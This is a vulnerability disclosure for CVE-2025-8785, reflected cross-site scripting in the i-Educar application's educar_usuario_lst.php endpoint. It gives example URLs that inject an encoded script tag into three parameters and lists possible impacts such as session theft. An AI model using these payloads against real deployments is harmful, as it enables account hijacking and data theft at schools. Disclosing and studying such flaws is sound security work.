CVE-2025-8785: Multiples Cross-Site Scripting (XSS) Reflected in endpoint educar_usuario_lst.php
CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-8785
Summary
Multiples Reflected Cross-Site Scripting (XSS) vulnerabilities was identified in the educar_usuario_lst.php endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the nm_pessoa, matricula and matricula_interna parameters.
Details
Vulnerable Endpoint: educar_usuario_lst.php
Parameters: nm_pessoa, matricula and matricula_interna
PoC
Payload:
| |
Example URLs:
/intranet/educar_usuario_lst.php?nm_pessoa=%22%3E%3Cscript%3Ealert('XSS-PoC2')%3C/script%3E
/intranet/educar_usuario_lst.php?matricula=%22%3E%3Cscript%3Ealert('XSS-PoC2')%3C/script%3E
/intranet/educar_usuario_lst.php?matricula_interna=%22%3E%3Cscript%3Ealert('XSS-PoC2')%3C/script%3E
Impact
- Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.
- Downloading malware: Attackers can trick users into downloading and installing malware on their computers.
- Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.
- Stealing credentials: Attackers can steal a user's credentials.
- Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.
- Defacing websites: Attackers can deface a website by altering its content.
- Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.
- Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.
Reference
https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-8785.md
Finder
By: CVE-Hunters